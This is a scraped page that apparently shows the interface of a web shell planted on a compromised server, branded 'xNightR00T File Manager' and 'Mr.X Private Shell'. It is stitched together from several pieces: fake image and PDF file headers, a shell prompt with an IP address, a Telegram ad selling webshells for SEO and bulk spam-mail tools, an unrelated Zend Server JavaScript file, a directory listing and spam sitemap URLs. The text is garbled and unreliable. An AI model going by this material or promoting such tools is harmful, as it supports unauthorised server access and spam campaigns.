xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
var zgridAuditInfo = new Class({
	Implements: [Events,Options],
	
	parseProgress: function(progress){
		var dictionary = {
				"AUDIT_PROGRESS_REQUESTED": _t('Requested'),
				"AUDIT_PROGRESS_STARTED": _t('Started'),
				"AUDIT_PROGRESS_ENDED_SUCCESFULLY": _t('Success'),
				"AUDIT_PROGRESS_ENDED_FAILED": _t('Failed'),
		};
		return dictionary[progress];
	},
	
	getOptions: function(){
		return {
			url: null
		};
	},
	
	initialize: function(options){
		this.setOptions(this.getOptions(), options);
	},
	
	onLoadData: function (data, response)
	{
		
		if (response) {
			var rowContent = this.getRow(response.responseData);
			$(data.rowId).set('html', rowContent);
			var myVerticalSlide = new Fx.Slide('tableDescContent_' + data.id);
			myVerticalSlide.hide();
			myVerticalSlide.slideIn();
		}
	},
	
	loadData: function(data)
	{
		// if data already loaded - just show them
		if ($('tableDescContent_' + data.id).get('html') != '') {
			var myVerticalSlide = new Fx.Slide('tableDescContent_' + data.id);
			myVerticalSlide.hide();
			myVerticalSlide.slideIn();
			return;
		}
		
		if (!this.options.url)
			return;
		
		var params = {
			auditId: data.id,
		};
		
		var request = new Request.WebAPI({url: this.options.url, data:params});

		request.addEvent("complete", this.onLoadData.bind(this, data));

		request.get();
	}, 
	
	getRow: function(data) {
		var auditMessage = data.auditMessageDetails.auditMessage;
		var auditProgressList = data.auditMessageDetails.auditProgressList;
		
        var html = '<div id="tableDescContent_' + auditMessage.id + '" class="auditDetails">';
        var parsedExtraData = this.parseExtraData('', auditMessage);
        if (auditMessage.extraData
        		&& ((((typeof auditMessage.extraData) == 'object') && (Object.getLength(auditMessage.extraData) > 0)))
        				|| auditMessage.extraData.length > 0) {
			html += '<div class="content">' + _t('Extra Details:<br />') + parsedExtraData + '</div>';
        } else {
        	html += '<div class="content">' + _t('No extra details to display') + parsedExtraData + '</div>';
        }
        
        if (0 < auditProgressList.length) {
        	html += '<div class="content">';
        	html +=	'<table class="tableWithDescServers">';
        	html +=  '<thead><tr> \
        		<th>!</th> \
        		<th>' + _t('Server Name') + '</th> \
        		<th>' + _t('Progress') + '</th> \
        		<th>' + _t('Time Stamp') + '</th> \
        		<th>' + _t('Extra Information') + '</th> \
        		</tr></thead>';
        	
        	html += auditProgressList.map(function (progress) {
        		return '<tbody><tr><td></td>\
        		<td>'+ progress.serverName +'</td>\
        		<td>'+ this.parseProgress(progress.progress) +'</td>\
        		<td>'+ zGrid2.prototype.timestamp(progress.creationTimeTimestamp) +'</td>\
        		<td class="progressExtraData">'+ this.parseExtraData('', progress) +'</td></tr></tbody>';
        	}.bind(this)).join('');
        	
        	
        	html += '</table></div>';
        	html += '</div>';
        }
        return html;
	},
	
	_parseExtraData: function(column, data, wrapper, joinglue, separateLabels) {
		var output = [];
		Object.each(data.extraData, function (parametersGroup, key, array) {
			var paramsOutput = [];
			parametersGroup.each(function(item, key, array){
				var prefix = '';
				if (isNaN(item.name)) { // adding the key to the string only if it's non numeric (NAN) key 
					prefix += item.name.htmlEntities() + ': ';
					// separate labels from content if content is multi-line
					if (separateLabels && isString(item.value) && item.value.contains("\n")) {
						prefix += '<br />';
					}
				}
				
				if (isString(item.value)) {
					paramsOutput.push(wrapper[0] + prefix + item.value.htmlEntities() + wrapper[1]);
				} else if (item.value instanceof Array) {
					paramsOutput.push(wrapper[0] + prefix + item.value.join(',').htmlEntities() + wrapper[1]);
				} else if (item.value instanceof Object) {
					paramsOutput.push(wrapper[0] + prefix + Object.toQueryString(item.value).htmlEntities() + wrapper[1]);
				}
			});
			output.push(paramsOutput.join(joinglue));
		});
		return output;
	},
	
	parseFlatExtraData: function (column, data) {
		return this._parseExtraData(column, data, ['', ''], ', ', false).join('<br />');
	},
	
    parseExtraData: function (column, data) {
		return this._parseExtraData(column, data, ['<pre>', '</pre>'], '', true).join('<br />');
	},
	
    parseExtraDataLimited: function (column, data) {  
    	dataSize = Object.keys(data.extraData).length;
    	if (dataSize > 1) {
    		return 'There are ' + dataSize + ' messages';
    	}
    	
    	return zgridAuditInfo.prototype.parseFlatExtraData(column, data);
    },	
	
	clean: function(value) {
		var cleaner = new Element('div');
		cleaner.set('text', value);
		
		return cleaner.get('html');
	}
});

Filemanager

Name Type Size Permission Actions
ammap Folder 0755
datepicker Folder 0755
deploymentLibraries Folder 0755
devbar Folder 0755
highcharts Folder 0755
highcharts-new Folder 0755
highstock Folder 0755
monitor Folder 0755
plugins Folder 0755
simplemodal Folder 0755
uploader Folder 0755
FormWizard.js File 6.84 KB 0644
FragmentManager.js File 4.5 KB 0644
Fx.Scroll.Carousel.js File 2.84 KB 0644
Spinner.js File 11.52 KB 0644
TabPane.Extra.js File 1.36 KB 0644
TabPane.js File 2.46 KB 0644
ToolTip.js File 8.47 KB 0644
charts.js File 12.38 KB 0644
debuggerSettings.js File 6.98 KB 0644
defineWizard.js File 2.81 KB 0644
deploymentWizard.js File 5.04 KB 0644
ellipsis.js File 4.01 KB 0644
filter.js File 35.59 KB 0644
floatingtips.js File 8.88 KB 0644
general.js File 9.45 KB 0644
highlighter.js File 3.16 KB 0644
init.js File 5.76 KB 0644
integrateWizard.js File 2.13 KB 0644
ipwidget.js File 1.85 KB 0644
monitorRules.js File 699 B 0644
mootools-autocompleter-1.2.js File 11.67 KB 0644
mootools-more.js File 340.68 KB 0644
mootools.js File 143.5 KB 0644
onOffButton.js File 1.96 KB 0644
persistantHeaders.js File 7.28 KB 0644
placeholder.js File 970 B 0644
pluginDeploymentWizard.js File 3.58 KB 0644
plugins.js File 9.23 KB 0644
searchField.js File 3.16 KB 0644
toast.js File 8.41 KB 0644
valuesList.js File 1.74 KB 0644
version.js File 1.35 KB 0644
z-ray-libs.js File 543.21 KB 0644
z-ray-libs.min.js File 495.1 KB 0644
z-ray-libs.min.js.map File 594.33 KB 0644
zPicker.Date.js File 166 B 0644
zendcom.js File 5.35 KB 0644
zgrid.js File 14.99 KB 0644
zgrid2.js File 31.71 KB 0644
zgridApplicationInfo.js File 14.01 KB 0644
zgridAuditInfo.js File 4.89 KB 0644
zgridDirectives.js File 16.83 KB 0644
zgridEventDetails.js File 9.13 KB 0644
zgridJobDetails.js File 1.42 KB 0644
zgridLibraryDetails.js File 6.1 KB 0644
zgridPluginInfo.js File 6.96 KB 0644
zgridPolling.js File 2.14 KB 0644
zgridQueueDetails.js File 1.42 KB 0644
zgridServerDetails.js File 5.16 KB 0644
zgridVhostInfo.js File 12.79 KB 0644
zmenu.js File 6.12 KB 0644
zpager.js File 4.7 KB 0644
zsLicenseValidation.js File 2.34 KB 0644
zswebapi.js File 2.29 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml